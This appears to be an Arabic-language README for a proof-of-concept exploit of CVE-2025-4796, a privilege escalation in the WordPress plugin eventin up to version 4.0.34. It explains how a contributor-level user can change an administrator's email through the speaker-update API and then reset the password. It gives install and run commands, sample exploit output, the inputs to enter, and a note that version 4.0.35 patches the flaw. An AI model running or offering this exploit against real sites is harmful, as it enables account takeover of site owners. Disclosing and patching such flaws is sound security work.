
eventin <= 4.0.34 - تصعيد الامتيازات عبر تغيير البريد الإلكتروني للمستخدم / الاستيلاء على الحساب للمساهم الموثّق+
eventin <= 4.0.34 - تصعيد صلاحيات عبر تغيير البريد الإلكتروني للمستخدم / الاستيلاء على الحساب للمستخدمين المخولين بمساهم أو أعلى
خلل تصعيد صلاحيات في إضافة ووردبريس eventin (<= 4.0.34) يسمح لأي مستخدم بمساهم أو أعلى بتغيير البريد الإلكتروني لأي مستخدم عبر واجهة برمجة التطبيقات الخاصة بتحديث المتحدثين. عن طريق تغيير البريد الإلكتروني للمسؤول إلى بريد يسيطر عليه المهاجم، يمكنه إعادة تعيين كلمة المرور والاستيلاء على الحساب.
eventin\speaker\api\speakercontroller::update_item)لا يقوم eventin بالتحقق بشكل صحيح من هوية المستخدم الذي يطلب التحديث أو ما إذا كان مسموحًا له بتغيير البريد الإلكتروني للمستخدم. يمكن للمستخدم بمساهم أو أعلى استدعاء هذه النقطة الطرفية:
المتطلبات:
تثبيت requests:
pip install requests
قم بتشغيل السكربت وأدخل القيم المطلوبة عندما يُطلب منك:
python3 CVE-2025-4796.py
[+] إيقاف تحذيرات التحقق من SSL
[+] تسجيل الدخول إلى ووردبريس.
[+] تم تسجيل الدخول بنجاح.
[+] جلب رمز nonce
[+] تم العثور على رمز nonce: abcdef1234567890
[+] طلب تحديث البريد الإلكتروني للمتحدث
[+] تمت عملية التحديث بنجاح.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
تم إصدار التصحيح في الإصدار 4.0.35 من إضافة eventin. يُنصح بشدة مسؤولي المواقع بتحديثها إلى هذا الإصدار فورًا. يتضمن الإصلاح فحوصات إضافية للتحقق من صحة المستخدم في دالة SpeakerController::update_item